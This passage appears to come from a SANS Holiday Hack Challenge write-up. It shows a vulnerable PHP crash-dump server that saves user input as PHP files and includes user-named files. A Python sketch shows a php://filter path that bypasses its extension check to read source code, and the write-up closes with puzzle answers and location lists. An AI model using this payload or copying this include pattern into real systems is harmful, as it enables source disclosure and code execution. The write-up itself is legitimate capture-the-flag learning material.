$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if(strcasecmp($contentType, 'application/json') != 0){
    die("Content type must be: application/json,\n");
}

# Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);
# If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
    die("POST contains invalid JSON! \n");
}

# Process the JSON.
if ( ! isset( $obj['operation']) or (
    $obj['operation'] !== "WriteCrashDump" and
    $obj['operation'] !== "ReadCrashDump"))
    {
    die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}
if ( isset($obj['data'])) {
    if ($obj['operation'] === "WriteCrashDump") {
        # Write a new crash dump to disk
        processCrashDump($obj['data']);
    }
    elseif ($obj['operation'] === "ReadCrashDump") {
        # Read a crash dump back from disk
        readCrashdump($obj['data']);
    }
}
else {
    # data key unset
    die("Fatal error! JSON key 'data' must be set. \n");
}
function processCrashdump($crashdump) {
    $basepath = "/var/www/html/docs/";
    $outputfilename = tempnam($basepath, "crashdump-");
    unlink($outputfilename);

    $outputfilename = $outputfilename . ".php";
    $basename = basename($outputfilename);

    $crashdump_encoded = "<?php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');";
    file_put_contents($outputfilename, $crashdump_encoded);

    print <<<END
{
    "success" : true,
    "folder" : "docs",
    "crashdump" : "$basename"
}

END;
}
function readCrashdump($requestedCrashdump) {
    $basepath = "/var/www/html/docs/";
    chdir($basepath);

    if ( ! isset($requestedCrashdump['crashdump'])) {
        die("Fatal error! JSON key 'crashdump' must be set. \n");
    }

    if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) {
        die("Fatal error! crashdump value duplicate '.php' extension detected.\n");
    }
    else {
        require($requestedCrashdump['crashdump'] . '.php');
    }
}

?>
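With the source in hand it's easy to see why the filter path sails through: readCrashdump only rejects a value whose text after the last "." is exactly "php", then appends ".php" and passes the result to require. Below is a short Python sketch of that check plus the decode step. passes_extension_check is my own name for a rough mirror of the PHP condition, and the base64 round trip uses only the first lines of the recovered file rather than the full server response.

```python
import base64
import re


def passes_extension_check(crashdump):
    """Approximate the PHP test substr(strrchr($value, "."), 1) === "php".

    Returns True when the server would go on to require($value . '.php').
    """
    _, dot, tail = crashdump.rpartition(".")
    return not (dot and tail == "php")


for value in ("crashdump-QpU4La.php",
              "crashdump-QpU4La",
              "php://filter/convert.base64-encode/resource=exception"):
    print(value, "->", passes_extension_check(value))

# Stand-in for the server response: the opening lines of exception.php, encoded.
first_lines = ("<?php \n\n# Audio file from Discombobulator in webroot: "
               "discombobulated-audio-6-XyzE3N9YqKNH.mp3\n")
encoded = base64.b64encode(first_lines.encode()).decode()

# What `| base64 -d` does on the command line.
decoded = base64.b64decode(encoded).decode()
match = re.search(r"[\w-]+\.mp3", decoded)
print(match.group(0) if match else "no audio file mentioned")
```

The last "." in the filter path sits inside "convert.base64-encode", so the text after it is nowhere near "php" and the require goes ahead with "resource=exception.php".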

Question 08 - The Goods

8) What are the names of the audio files you discovered from each system above? There are a total of SEVEN audio files (one from the original APK in Question 4, plus one for each of the six items in the bullet list above.) Please note: Although each system is remotely exploitable, we DO NOT expect every participant to compromise every element of the SantaGram infrastructure. Gain access to the ones you can. Although we will give special consideration to entries that successfully compromise all six vulnerabilities and retrieve their audio files, we happily accept partial answers and point out that they too are eligible for any of the prizes.

The 7 audio files are below.

Question 09 - Cyborgs Learning Chess

9) Who is the villain behind the nefarious plot.

I struggled with the audio quite a bit and realized I know absolutely nothing about audio forensics or mixing in general. Even so, I managed to figure it out after hours of listening to this thing on loop and reversing, speeding up, slowing down, noise canceling, etc. I'd highly recommend Audacity for A) being free and B) having tons of capabilities in a user-friendly interface.

In the end, speeding it up 500%, changing the pitch to D#3, along with a few guesses, led me to the answer. The combined audio can be played below or downloaded here.

The first part of the audio made sense..."Father Christmas, Santa Claus". Ok, I get it. Santa, Father Christmas. Holiday Challenge. Roger that.

The second part though...it made no sense at all - "Father Christmas, Santa Claus, as Cyborgs learning Chess".

I spent the next two nights on the audio and honestly had a blast just hanging out in the final room ("The Corridor") with a bunch of other players. We'd shoot the breeze, talk to each other, give hints, and had a lot of laughs at each other's frustrations. The social aspect of the game this year was fantastic and is sorely lacking in other CTFs.

Googling around for what I believe the phrase to be, I stumbled upon this link.

I began reading a lot of the Doctor Who stuff and noted the TARDIS on Santa's office desk.

I still couldn't figure out what the password was and tried lots of episode names, character names, and other Doctor Who/Christmas references to no avail. That changed when someone told me they also thought the last audio file sounded like "chess", but that it wasn't.

Knowing I had the audio wrong, I began trying to dissect the last few words. The 4th audio file I just couldn't place. It sounded like "as" or "and" and I started typing variations into Google.


When I saw the TARDIS Data Core website's profile for Santa, I thought it was odd that they listed "Jeff" as an alias but now it all made sense.

Trying the password "father christmas santa claus or as ive always known him jeff" opens the last door and pulls back the curtain on this mystery.

The answer to Question 9 is "Doctor Who", of course!

Question 10 - Why?!

10) Why had the villain abducted Santa? Please note: You can determine the plot and the identity of the villain with access to as few as five of the seven audio files. However, as stated above, participants who gain access to all seven audio files will be given special consideration. Again, you do not need to compromise all the SantaGram servers to answer items 9 and 10. Partial answers are completely welcomed and are certainly eligible to win.

Doctor Who looked into a time vortex and saw a universe where the Star Wars Holiday Special never happened, and decided the world would be better off not having suffered through the misery of seeing it. Basically, he's a madman. The Star Wars Holiday Special was awesome and Itchy, Malla, and Lumpy would agree!

Aarrr wgh ggwaaah!

Cranberry Pi Parts

Heat Sink - Elf House #2 - Upstairs

Cranberry Pi Board - Elf House #1 -> Secret Fireplace Room

Power Cord - The North Pole

SD Card - The North Pole

HDMI Cable - Workshop

Once you have all of the parts, head back to Holly Evergreen at the start of the game and tell her the password extracted in Question 5 ("yummycookies").

Coin Locations - Present Day

Coin 01 - The North Pole (behind roof)

Coin 02 - Elf House #2 (in Kitchen)

Coin 03 - Elf House #2 (under couch)

Coin 04 - Elf House #2 - Upstairs (in trough)

Coin 05 - Elf House #2 - Room 2

Coin 06 - Elf House #1 -> Secret Fireplace Room

Coin 07 - NetWars Experience Treehouse (left side)

Coin 08 - The North Pole (on top of NetWars roof)

Coin 09 - Small Tree House

Coin 10 - The North Pole (front of Santa's Workshop)

Coin 11 - Workshop (conveyor belt)

Coin 12 - DFER

Coin 13 - The Corridor

Coin Locations - 1978

Coin 14 - The North Pole (beyond Holly Evergreen)

Coin 15 - The North Pole (behind two houses on left)

Coin 16 - The Big Tree (upstairs)

Coin 17 - NetWars Experience Treehouse (right side)

Coin 18 - Santa's Office (in knight's hand)

Coin 19 - Workshop (behind boxes)

Coin 20 - Workshop - Train Station

With that, we wrap up the last of the in-game achievements and fully complete this year's challenge!

Props again to the SANS team for another great Holiday Hack Challenge!

Until next year...
